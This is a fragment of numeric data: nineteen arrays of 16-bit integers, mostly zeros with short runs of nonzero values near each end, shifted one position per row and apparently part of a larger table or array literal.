[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 10304, 33808, 13444, 35649, 63718, 34310, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 24576, 22528, 5632, 62848, 41312, 6943],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 63552, 19472, 39812, 41537, 26086, 774, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 53248, 13312, 60672, 832, 63184, 23604, 36589, 59854],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 51264, 5136, 644, 47425, 53990, 32774, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 57344, 63488, 48640, 24448, 15328, 24056, 26814, 34793],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 38976, 56336, 27012, 53313, 16358, 64774, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 12288, 3072, 8960, 32960, 18992, 64524, 48419, 23776],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 26688, 42000, 53380, 59201, 44262, 31238, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 45056, 44032, 2816, 43712, 8368, 27820, 41187],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 14400, 27664, 14212, 65089, 6630, 63238, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 36864, 9216, 10496, 29248, 55952, 4900, 10025, 23522],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 2112, 13328, 40580, 5441, 34534, 29702, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 40960, 43008, 43520, 14976, 23200, 64424, 60586, 4237],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 55360, 64528, 1412, 11329, 62438, 61702, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 61440, 31744, 32512, 14272, 65520, 46972, 57983, 33620],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 43072, 50192, 27780, 17217, 24806, 28166, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 57344, 14336, 52736, 33664, 15584, 3128, 52583],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 30784, 35856, 54148, 23105, 52710, 60166, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 20480, 5120, 42240, 12608, 21072, 53012, 47269, 43958],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 18496, 21520, 14980, 28993, 15078, 26630, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 24576, 22528, 54784, 42368, 40288, 16984, 45782, 47601],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 6208, 7184, 41348, 34881, 42982, 58630, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 45056, 60416, 6912, 48832, 43440, 36844, 34587, 2440],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 59456, 58384, 2180, 40769, 5350, 25094, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 1024, 41216, 24640, 64016, 27652, 17579],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 47168, 44048, 28548, 46657, 33254, 57094, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 1024, 24832, 16448, 7696, 4, 40801, 19786],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 34880, 29712, 54916, 52545, 61158, 23558, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 8192, 2048, 16896, 41088, 50208, 25096, 18242, 2069],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 22592, 15376, 15748, 58433, 23526, 55558, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 28672, 23552, 63232, 5568, 1904, 30044, 9975, 50044],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 10304, 1040, 42116, 64321, 51430, 22022, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 256, 2112, 47120, 27311],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 63552, 52240, 2948, 4673, 13798, 54022, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 53248, 62464, 23808, 40768, 64976, 5620, 30557, 29854],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 51264, 37904, 29316, 10561, 41702, 20486, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 57344, 47104, 60928, 11136, 36576, 35512, 30190, 16121],
